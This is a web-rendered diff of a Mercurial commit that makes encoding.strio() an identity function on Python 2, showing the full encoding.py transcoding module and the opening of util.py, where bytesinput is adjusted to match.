##// END OF EJS Templates
py3: make encoding.strio() an identity function on Python 2...
Yuya Nishihara -
r33852:f18b1153 default
parent child Browse files
Show More
@@ -1,589 +1,591 b''
1 1 # encoding.py - character transcoding support for Mercurial
2 2 #
3 3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import array
11 11 import io
12 12 import locale
13 13 import os
14 14 import unicodedata
15 15
16 16 from . import (
17 17 error,
18 18 policy,
19 19 pycompat,
20 20 )
21 21
22 22 charencode = policy.importmod(r'charencode')
23 23
24 24 asciilower = charencode.asciilower
25 25 asciiupper = charencode.asciiupper
26 26
27 27 _sysstr = pycompat.sysstr
28 28
29 29 if pycompat.ispy3:
30 30 unichr = chr
31 31
32 32 # These unicode characters are ignored by HFS+ (Apple Technote 1150,
33 33 # "Unicode Subtleties"), so we need to ignore them in some places for
34 34 # sanity.
35 35 _ignore = [unichr(int(x, 16)).encode("utf-8") for x in
36 36 "200c 200d 200e 200f 202a 202b 202c 202d 202e "
37 37 "206a 206b 206c 206d 206e 206f feff".split()]
38 38 # verify the next function will work
39 39 assert all(i.startswith(("\xe2", "\xef")) for i in _ignore)
40 40
41 41 def hfsignoreclean(s):
42 42 """Remove codepoints ignored by HFS+ from s.
43 43
44 44 >>> hfsignoreclean(u'.h\u200cg'.encode('utf-8'))
45 45 '.hg'
46 46 >>> hfsignoreclean(u'.h\ufeffg'.encode('utf-8'))
47 47 '.hg'
48 48 """
49 49 if "\xe2" in s or "\xef" in s:
50 50 for c in _ignore:
51 51 s = s.replace(c, '')
52 52 return s
53 53
54 54 # encoding.environ is provided read-only, which may not be used to modify
55 55 # the process environment
56 56 _nativeenviron = (not pycompat.ispy3 or os.supports_bytes_environ)
57 57 if not pycompat.ispy3:
58 58 environ = os.environ # re-exports
59 59 elif _nativeenviron:
60 60 environ = os.environb # re-exports
61 61 else:
62 62 # preferred encoding isn't known yet; use utf-8 to avoid unicode error
63 63 # and recreate it once encoding is settled
64 64 environ = dict((k.encode(u'utf-8'), v.encode(u'utf-8'))
65 65 for k, v in os.environ.items()) # re-exports
66 66
67 67 _encodingfixers = {
68 68 '646': lambda: 'ascii',
69 69 'ANSI_X3.4-1968': lambda: 'ascii',
70 70 }
71 71
72 72 try:
73 73 encoding = environ.get("HGENCODING")
74 74 if not encoding:
75 75 encoding = locale.getpreferredencoding().encode('ascii') or 'ascii'
76 76 encoding = _encodingfixers.get(encoding, lambda: encoding)()
77 77 except locale.Error:
78 78 encoding = 'ascii'
79 79 encodingmode = environ.get("HGENCODINGMODE", "strict")
80 80 fallbackencoding = 'ISO-8859-1'
81 81
82 82 class localstr(bytes):
83 83 '''This class allows strings that are unmodified to be
84 84 round-tripped to the local encoding and back'''
85 85 def __new__(cls, u, l):
86 86 s = bytes.__new__(cls, l)
87 87 s._utf8 = u
88 88 return s
89 89 def __hash__(self):
90 90 return hash(self._utf8) # avoid collisions in local string space
91 91
92 92 def tolocal(s):
93 93 """
94 94 Convert a string from internal UTF-8 to local encoding
95 95
96 96 All internal strings should be UTF-8 but some repos before the
97 97 implementation of locale support may contain latin1 or possibly
98 98 other character sets. We attempt to decode everything strictly
99 99 using UTF-8, then Latin-1, and failing that, we use UTF-8 and
100 100 replace unknown characters.
101 101
102 102 The localstr class is used to cache the known UTF-8 encoding of
103 103 strings next to their local representation to allow lossless
104 104 round-trip conversion back to UTF-8.
105 105
106 106 >>> u = 'foo: \\xc3\\xa4' # utf-8
107 107 >>> l = tolocal(u)
108 108 >>> l
109 109 'foo: ?'
110 110 >>> fromlocal(l)
111 111 'foo: \\xc3\\xa4'
112 112 >>> u2 = 'foo: \\xc3\\xa1'
113 113 >>> d = { l: 1, tolocal(u2): 2 }
114 114 >>> len(d) # no collision
115 115 2
116 116 >>> 'foo: ?' in d
117 117 False
118 118 >>> l1 = 'foo: \\xe4' # historical latin1 fallback
119 119 >>> l = tolocal(l1)
120 120 >>> l
121 121 'foo: ?'
122 122 >>> fromlocal(l) # magically in utf-8
123 123 'foo: \\xc3\\xa4'
124 124 """
125 125
126 126 try:
127 127 try:
128 128 # make sure string is actually stored in UTF-8
129 129 u = s.decode('UTF-8')
130 130 if encoding == 'UTF-8':
131 131 # fast path
132 132 return s
133 133 r = u.encode(_sysstr(encoding), u"replace")
134 134 if u == r.decode(_sysstr(encoding)):
135 135 # r is a safe, non-lossy encoding of s
136 136 return r
137 137 return localstr(s, r)
138 138 except UnicodeDecodeError:
139 139 # we should only get here if we're looking at an ancient changeset
140 140 try:
141 141 u = s.decode(_sysstr(fallbackencoding))
142 142 r = u.encode(_sysstr(encoding), u"replace")
143 143 if u == r.decode(_sysstr(encoding)):
144 144 # r is a safe, non-lossy encoding of s
145 145 return r
146 146 return localstr(u.encode('UTF-8'), r)
147 147 except UnicodeDecodeError:
148 148 u = s.decode("utf-8", "replace") # last ditch
149 149 # can't round-trip
150 150 return u.encode(_sysstr(encoding), u"replace")
151 151 except LookupError as k:
152 152 raise error.Abort(k, hint="please check your locale settings")
153 153
154 154 def fromlocal(s):
155 155 """
156 156 Convert a string from the local character encoding to UTF-8
157 157
158 158 We attempt to decode strings using the encoding mode set by
159 159 HGENCODINGMODE, which defaults to 'strict'. In this mode, unknown
160 160 characters will cause an error message. Other modes include
161 161 'replace', which replaces unknown characters with a special
162 162 Unicode character, and 'ignore', which drops the character.
163 163 """
164 164
165 165 # can we do a lossless round-trip?
166 166 if isinstance(s, localstr):
167 167 return s._utf8
168 168
169 169 try:
170 170 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
171 171 return u.encode("utf-8")
172 172 except UnicodeDecodeError as inst:
173 173 sub = s[max(0, inst.start - 10):inst.start + 10]
174 174 raise error.Abort("decoding near '%s': %s!" % (sub, inst))
175 175 except LookupError as k:
176 176 raise error.Abort(k, hint="please check your locale settings")
177 177
178 178 def unitolocal(u):
179 179 """Convert a unicode string to a byte string of local encoding"""
180 180 return tolocal(u.encode('utf-8'))
181 181
182 182 def unifromlocal(s):
183 183 """Convert a byte string of local encoding to a unicode string"""
184 184 return fromlocal(s).decode('utf-8')
185 185
186 186 def unimethod(bytesfunc):
187 187 """Create a proxy method that forwards __unicode__() and __str__() of
188 188 Python 3 to __bytes__()"""
189 189 def unifunc(obj):
190 190 return unifromlocal(bytesfunc(obj))
191 191 return unifunc
192 192
193 193 # converter functions between native str and byte string. use these if the
194 194 # character encoding is not aware (e.g. exception message) or is known to
195 195 # be locale dependent (e.g. date formatting.)
196 196 if pycompat.ispy3:
197 197 strtolocal = unitolocal
198 198 strfromlocal = unifromlocal
199 199 strmethod = unimethod
200 200 else:
201 201 strtolocal = pycompat.identity
202 202 strfromlocal = pycompat.identity
203 203 strmethod = pycompat.identity
204 204
205 205 if not _nativeenviron:
206 206 # now encoding and helper functions are available, recreate the environ
207 207 # dict to be exported to other modules
208 208 environ = dict((tolocal(k.encode(u'utf-8')), tolocal(v.encode(u'utf-8')))
209 209 for k, v in os.environ.items()) # re-exports
210 210
211 211 # How to treat ambiguous-width characters. Set to 'wide' to treat as wide.
212 212 _wide = _sysstr(environ.get("HGENCODINGAMBIGUOUS", "narrow") == "wide"
213 213 and "WFA" or "WF")
214 214
215 215 def colwidth(s):
216 216 "Find the column width of a string for display in the local encoding"
217 217 return ucolwidth(s.decode(_sysstr(encoding), u'replace'))
218 218
219 219 def ucolwidth(d):
220 220 "Find the column width of a Unicode string for display"
221 221 eaw = getattr(unicodedata, 'east_asian_width', None)
222 222 if eaw is not None:
223 223 return sum([eaw(c) in _wide and 2 or 1 for c in d])
224 224 return len(d)
225 225
226 226 def getcols(s, start, c):
227 227 '''Use colwidth to find a c-column substring of s starting at byte
228 228 index start'''
229 229 for x in xrange(start + c, len(s)):
230 230 t = s[start:x]
231 231 if colwidth(t) == c:
232 232 return t
233 233
234 234 def trim(s, width, ellipsis='', leftside=False):
235 235 """Trim string 's' to at most 'width' columns (including 'ellipsis').
236 236
237 237 If 'leftside' is True, left side of string 's' is trimmed.
238 238 'ellipsis' is always placed at trimmed side.
239 239
240 240 >>> ellipsis = '+++'
241 241 >>> from . import encoding
242 242 >>> encoding.encoding = 'utf-8'
243 243 >>> t= '1234567890'
244 244 >>> print trim(t, 12, ellipsis=ellipsis)
245 245 1234567890
246 246 >>> print trim(t, 10, ellipsis=ellipsis)
247 247 1234567890
248 248 >>> print trim(t, 8, ellipsis=ellipsis)
249 249 12345+++
250 250 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
251 251 +++67890
252 252 >>> print trim(t, 8)
253 253 12345678
254 254 >>> print trim(t, 8, leftside=True)
255 255 34567890
256 256 >>> print trim(t, 3, ellipsis=ellipsis)
257 257 +++
258 258 >>> print trim(t, 1, ellipsis=ellipsis)
259 259 +
260 260 >>> u = u'\u3042\u3044\u3046\u3048\u304a' # 2 x 5 = 10 columns
261 261 >>> t = u.encode(encoding.encoding)
262 262 >>> print trim(t, 12, ellipsis=ellipsis)
263 263 \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
264 264 >>> print trim(t, 10, ellipsis=ellipsis)
265 265 \xe3\x81\x82\xe3\x81\x84\xe3\x81\x86\xe3\x81\x88\xe3\x81\x8a
266 266 >>> print trim(t, 8, ellipsis=ellipsis)
267 267 \xe3\x81\x82\xe3\x81\x84+++
268 268 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
269 269 +++\xe3\x81\x88\xe3\x81\x8a
270 270 >>> print trim(t, 5)
271 271 \xe3\x81\x82\xe3\x81\x84
272 272 >>> print trim(t, 5, leftside=True)
273 273 \xe3\x81\x88\xe3\x81\x8a
274 274 >>> print trim(t, 4, ellipsis=ellipsis)
275 275 +++
276 276 >>> print trim(t, 4, ellipsis=ellipsis, leftside=True)
277 277 +++
278 278 >>> t = '\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa' # invalid byte sequence
279 279 >>> print trim(t, 12, ellipsis=ellipsis)
280 280 \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
281 281 >>> print trim(t, 10, ellipsis=ellipsis)
282 282 \x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa
283 283 >>> print trim(t, 8, ellipsis=ellipsis)
284 284 \x11\x22\x33\x44\x55+++
285 285 >>> print trim(t, 8, ellipsis=ellipsis, leftside=True)
286 286 +++\x66\x77\x88\x99\xaa
287 287 >>> print trim(t, 8)
288 288 \x11\x22\x33\x44\x55\x66\x77\x88
289 289 >>> print trim(t, 8, leftside=True)
290 290 \x33\x44\x55\x66\x77\x88\x99\xaa
291 291 >>> print trim(t, 3, ellipsis=ellipsis)
292 292 +++
293 293 >>> print trim(t, 1, ellipsis=ellipsis)
294 294 +
295 295 """
296 296 try:
297 297 u = s.decode(_sysstr(encoding))
298 298 except UnicodeDecodeError:
299 299 if len(s) <= width: # trimming is not needed
300 300 return s
301 301 width -= len(ellipsis)
302 302 if width <= 0: # no enough room even for ellipsis
303 303 return ellipsis[:width + len(ellipsis)]
304 304 if leftside:
305 305 return ellipsis + s[-width:]
306 306 return s[:width] + ellipsis
307 307
308 308 if ucolwidth(u) <= width: # trimming is not needed
309 309 return s
310 310
311 311 width -= len(ellipsis)
312 312 if width <= 0: # no enough room even for ellipsis
313 313 return ellipsis[:width + len(ellipsis)]
314 314
315 315 if leftside:
316 316 uslice = lambda i: u[i:]
317 317 concat = lambda s: ellipsis + s
318 318 else:
319 319 uslice = lambda i: u[:-i]
320 320 concat = lambda s: s + ellipsis
321 321 for i in xrange(1, len(u)):
322 322 usub = uslice(i)
323 323 if ucolwidth(usub) <= width:
324 324 return concat(usub.encode(_sysstr(encoding)))
325 325 return ellipsis # no enough room for multi-column characters
326 326
327 327 def lower(s):
328 328 "best-effort encoding-aware case-folding of local string s"
329 329 try:
330 330 return asciilower(s)
331 331 except UnicodeDecodeError:
332 332 pass
333 333 try:
334 334 if isinstance(s, localstr):
335 335 u = s._utf8.decode("utf-8")
336 336 else:
337 337 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
338 338
339 339 lu = u.lower()
340 340 if u == lu:
341 341 return s # preserve localstring
342 342 return lu.encode(_sysstr(encoding))
343 343 except UnicodeError:
344 344 return s.lower() # we don't know how to fold this except in ASCII
345 345 except LookupError as k:
346 346 raise error.Abort(k, hint="please check your locale settings")
347 347
348 348 def upper(s):
349 349 "best-effort encoding-aware case-folding of local string s"
350 350 try:
351 351 return asciiupper(s)
352 352 except UnicodeDecodeError:
353 353 return upperfallback(s)
354 354
355 355 def upperfallback(s):
356 356 try:
357 357 if isinstance(s, localstr):
358 358 u = s._utf8.decode("utf-8")
359 359 else:
360 360 u = s.decode(_sysstr(encoding), _sysstr(encodingmode))
361 361
362 362 uu = u.upper()
363 363 if u == uu:
364 364 return s # preserve localstring
365 365 return uu.encode(_sysstr(encoding))
366 366 except UnicodeError:
367 367 return s.upper() # we don't know how to fold this except in ASCII
368 368 except LookupError as k:
369 369 raise error.Abort(k, hint="please check your locale settings")
370 370
371 371 class normcasespecs(object):
372 372 '''what a platform's normcase does to ASCII strings
373 373
374 374 This is specified per platform, and should be consistent with what normcase
375 375 on that platform actually does.
376 376
377 377 lower: normcase lowercases ASCII strings
378 378 upper: normcase uppercases ASCII strings
379 379 other: the fallback function should always be called
380 380
381 381 This should be kept in sync with normcase_spec in util.h.'''
382 382 lower = -1
383 383 upper = 1
384 384 other = 0
385 385
386 386 _jsonmap = []
387 387 _jsonmap.extend("\\u%04x" % x for x in range(32))
388 388 _jsonmap.extend(pycompat.bytechr(x) for x in range(32, 127))
389 389 _jsonmap.append('\\u007f')
390 390 _jsonmap[0x09] = '\\t'
391 391 _jsonmap[0x0a] = '\\n'
392 392 _jsonmap[0x22] = '\\"'
393 393 _jsonmap[0x5c] = '\\\\'
394 394 _jsonmap[0x08] = '\\b'
395 395 _jsonmap[0x0c] = '\\f'
396 396 _jsonmap[0x0d] = '\\r'
397 397 _paranoidjsonmap = _jsonmap[:]
398 398 _paranoidjsonmap[0x3c] = '\\u003c' # '<' (e.g. escape "</script>")
399 399 _paranoidjsonmap[0x3e] = '\\u003e' # '>'
400 400 _jsonmap.extend(pycompat.bytechr(x) for x in range(128, 256))
401 401
402 402 def jsonescape(s, paranoid=False):
403 403 '''returns a string suitable for JSON
404 404
405 405 JSON is problematic for us because it doesn't support non-Unicode
406 406 bytes. To deal with this, we take the following approach:
407 407
408 408 - localstr objects are converted back to UTF-8
409 409 - valid UTF-8/ASCII strings are passed as-is
410 410 - other strings are converted to UTF-8b surrogate encoding
411 411 - apply JSON-specified string escaping
412 412
413 413 (escapes are doubled in these tests)
414 414
415 415 >>> jsonescape('this is a test')
416 416 'this is a test'
417 417 >>> jsonescape('escape characters: \\0 \\x0b \\x7f')
418 418 'escape characters: \\\\u0000 \\\\u000b \\\\u007f'
419 419 >>> jsonescape('escape characters: \\t \\n \\r \\" \\\\')
420 420 'escape characters: \\\\t \\\\n \\\\r \\\\" \\\\\\\\'
421 421 >>> jsonescape('a weird byte: \\xdd')
422 422 'a weird byte: \\xed\\xb3\\x9d'
423 423 >>> jsonescape('utf-8: caf\\xc3\\xa9')
424 424 'utf-8: caf\\xc3\\xa9'
425 425 >>> jsonescape('')
426 426 ''
427 427
428 428 If paranoid, non-ascii and common troublesome characters are also escaped.
429 429 This is suitable for web output.
430 430
431 431 >>> jsonescape('escape boundary: \\x7e \\x7f \\xc2\\x80', paranoid=True)
432 432 'escape boundary: ~ \\\\u007f \\\\u0080'
433 433 >>> jsonescape('a weird byte: \\xdd', paranoid=True)
434 434 'a weird byte: \\\\udcdd'
435 435 >>> jsonescape('utf-8: caf\\xc3\\xa9', paranoid=True)
436 436 'utf-8: caf\\\\u00e9'
437 437 >>> jsonescape('non-BMP: \\xf0\\x9d\\x84\\x9e', paranoid=True)
438 438 'non-BMP: \\\\ud834\\\\udd1e'
439 439 >>> jsonescape('<foo@example.org>', paranoid=True)
440 440 '\\\\u003cfoo@example.org\\\\u003e'
441 441 '''
442 442
443 443 if paranoid:
444 444 jm = _paranoidjsonmap
445 445 else:
446 446 jm = _jsonmap
447 447
448 448 u8chars = toutf8b(s)
449 449 try:
450 450 return ''.join(jm[x] for x in bytearray(u8chars)) # fast path
451 451 except IndexError:
452 452 pass
453 453 # non-BMP char is represented as UTF-16 surrogate pair
454 454 u16codes = array.array('H', u8chars.decode('utf-8').encode('utf-16'))
455 455 u16codes.pop(0) # drop BOM
456 456 return ''.join(jm[x] if x < 128 else '\\u%04x' % x for x in u16codes)
457 457
458 458 _utf8len = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 3, 4]
459 459
460 460 def getutf8char(s, pos):
461 461 '''get the next full utf-8 character in the given string, starting at pos
462 462
463 463 Raises a UnicodeError if the given location does not start a valid
464 464 utf-8 character.
465 465 '''
466 466
467 467 # find how many bytes to attempt decoding from first nibble
468 468 l = _utf8len[ord(s[pos]) >> 4]
469 469 if not l: # ascii
470 470 return s[pos]
471 471
472 472 c = s[pos:pos + l]
473 473 # validate with attempted decode
474 474 c.decode("utf-8")
475 475 return c
476 476
477 477 def toutf8b(s):
478 478 '''convert a local, possibly-binary string into UTF-8b
479 479
480 480 This is intended as a generic method to preserve data when working
481 481 with schemes like JSON and XML that have no provision for
482 482 arbitrary byte strings. As Mercurial often doesn't know
483 483 what encoding data is in, we use so-called UTF-8b.
484 484
485 485 If a string is already valid UTF-8 (or ASCII), it passes unmodified.
486 486 Otherwise, unsupported bytes are mapped to UTF-16 surrogate range,
487 487 uDC00-uDCFF.
488 488
489 489 Principles of operation:
490 490
491 491 - ASCII and UTF-8 data successfully round-trips and is understood
492 492 by Unicode-oriented clients
493 493 - filenames and file contents in arbitrary other encodings can have
494 494 be round-tripped or recovered by clueful clients
495 495 - local strings that have a cached known UTF-8 encoding (aka
496 496 localstr) get sent as UTF-8 so Unicode-oriented clients get the
497 497 Unicode data they want
498 498 - because we must preserve UTF-8 bytestring in places such as
499 499 filenames, metadata can't be roundtripped without help
500 500
501 501 (Note: "UTF-8b" often refers to decoding a mix of valid UTF-8 and
502 502 arbitrary bytes into an internal Unicode format that can be
503 503 re-encoded back into the original. Here we are exposing the
504 504 internal surrogate encoding as a UTF-8 string.)
505 505 '''
506 506
507 507 if "\xed" not in s:
508 508 if isinstance(s, localstr):
509 509 return s._utf8
510 510 try:
511 511 s.decode('utf-8')
512 512 return s
513 513 except UnicodeDecodeError:
514 514 pass
515 515
516 516 r = ""
517 517 pos = 0
518 518 l = len(s)
519 519 while pos < l:
520 520 try:
521 521 c = getutf8char(s, pos)
522 522 if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
523 523 # have to re-escape existing U+DCxx characters
524 524 c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
525 525 pos += 1
526 526 else:
527 527 pos += len(c)
528 528 except UnicodeDecodeError:
529 529 c = unichr(0xdc00 + ord(s[pos])).encode('utf-8')
530 530 pos += 1
531 531 r += c
532 532 return r
533 533
534 534 def fromutf8b(s):
535 535 '''Given a UTF-8b string, return a local, possibly-binary string.
536 536
537 537 return the original binary string. This
538 538 is a round-trip process for strings like filenames, but metadata
539 539 that's was passed through tolocal will remain in UTF-8.
540 540
541 541 >>> roundtrip = lambda x: fromutf8b(toutf8b(x)) == x
542 542 >>> m = "\\xc3\\xa9\\x99abcd"
543 543 >>> toutf8b(m)
544 544 '\\xc3\\xa9\\xed\\xb2\\x99abcd'
545 545 >>> roundtrip(m)
546 546 True
547 547 >>> roundtrip("\\xc2\\xc2\\x80")
548 548 True
549 549 >>> roundtrip("\\xef\\xbf\\xbd")
550 550 True
551 551 >>> roundtrip("\\xef\\xef\\xbf\\xbd")
552 552 True
553 553 >>> roundtrip("\\xf1\\x80\\x80\\x80\\x80")
554 554 True
555 555 '''
556 556
557 557 # fast path - look for uDxxx prefixes in s
558 558 if "\xed" not in s:
559 559 return s
560 560
561 561 # We could do this with the unicode type but some Python builds
562 562 # use UTF-16 internally (issue5031) which causes non-BMP code
563 563 # points to be escaped. Instead, we use our handy getutf8char
564 564 # helper again to walk the string without "decoding" it.
565 565
566 566 r = ""
567 567 pos = 0
568 568 l = len(s)
569 569 while pos < l:
570 570 c = getutf8char(s, pos)
571 571 pos += len(c)
572 572 # unescape U+DCxx characters
573 573 if "\xed\xb0\x80" <= c <= "\xed\xb3\xbf":
574 574 c = chr(ord(c.decode("utf-8")) & 0xff)
575 575 r += c
576 576 return r
577 577
578 if pycompat.ispy3:
578 579 class strio(io.TextIOWrapper):
579 580 """Wrapper around TextIOWrapper that respects hg's encoding assumptions.
580 581
581 582 Also works around Python closing streams.
582 583 """
583 584
584 def __init__(self, buffer, **kwargs):
585 kwargs[r'encoding'] = _sysstr(encoding)
586 super(strio, self).__init__(buffer, **kwargs)
585 def __init__(self, buffer):
586 super(strio, self).__init__(buffer, encoding=_sysstr(encoding))
587 587
588 588 def __del__(self):
589 589 """Override __del__ so it doesn't close the underlying stream."""
590 else:
591 strio = pycompat.identity
@@ -1,3777 +1,3776 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 87 # buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bytesinput(fin, fout, *args, **kwargs):
176 176 sin, sout = sys.stdin, sys.stdout
177 177 try:
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
178 179 if pycompat.ispy3:
179 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
180 180 return encoding.strtolocal(input(*args, **kwargs))
181 181 else:
182 sys.stdin, sys.stdout = fin, fout
183 182 return raw_input(*args, **kwargs)
184 183 finally:
185 184 sys.stdin, sys.stdout = sin, sout
186 185
187 186 def bitsfrom(container):
188 187 bits = 0
189 188 for bit in container:
190 189 bits |= bit
191 190 return bits
192 191
193 192 # python 2.6 still have deprecation warning enabled by default. We do not want
194 193 # to display anything to standard user so detect if we are running test and
195 194 # only use python deprecation warning in this case.
196 195 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 196 if _dowarn:
198 197 # explicitly unfilter our warning for python 2.7
199 198 #
200 199 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 200 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 201 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 202 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 206
208 207 def nouideprecwarn(msg, version, stacklevel=1):
209 208 """Issue an python native deprecation warning
210 209
211 210 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 211 """
213 212 if _dowarn:
214 213 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 214 " update your code.)") % version
216 215 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217 216
218 217 DIGESTS = {
219 218 'md5': hashlib.md5,
220 219 'sha1': hashlib.sha1,
221 220 'sha512': hashlib.sha512,
222 221 }
223 222 # List of digest types from strongest to weakest
224 223 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225 224
226 225 for k in DIGESTS_BY_STRENGTH:
227 226 assert k in DIGESTS
228 227
229 228 class digester(object):
230 229 """helper to compute digests.
231 230
232 231 This helper can be used to compute one or more digests given their name.
233 232
234 233 >>> d = digester(['md5', 'sha1'])
235 234 >>> d.update('foo')
236 235 >>> [k for k in sorted(d)]
237 236 ['md5', 'sha1']
238 237 >>> d['md5']
239 238 'acbd18db4cc2f85cedef654fccc4a4d8'
240 239 >>> d['sha1']
241 240 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 241 >>> digester.preferred(['md5', 'sha1'])
243 242 'sha1'
244 243 """
245 244
246 245 def __init__(self, digests, s=''):
247 246 self._hashes = {}
248 247 for k in digests:
249 248 if k not in DIGESTS:
250 249 raise Abort(_('unknown digest type: %s') % k)
251 250 self._hashes[k] = DIGESTS[k]()
252 251 if s:
253 252 self.update(s)
254 253
255 254 def update(self, data):
256 255 for h in self._hashes.values():
257 256 h.update(data)
258 257
259 258 def __getitem__(self, key):
260 259 if key not in DIGESTS:
261 260 raise Abort(_('unknown digest type: %s') % k)
262 261 return self._hashes[key].hexdigest()
263 262
264 263 def __iter__(self):
265 264 return iter(self._hashes)
266 265
267 266 @staticmethod
268 267 def preferred(supported):
269 268 """returns the strongest digest type in both supported and DIGESTS."""
270 269
271 270 for k in DIGESTS_BY_STRENGTH:
272 271 if k in supported:
273 272 return k
274 273 return None
275 274
276 275 class digestchecker(object):
277 276 """file handle wrapper that additionally checks content against a given
278 277 size and digests.
279 278
280 279 d = digestchecker(fh, size, {'md5': '...'})
281 280
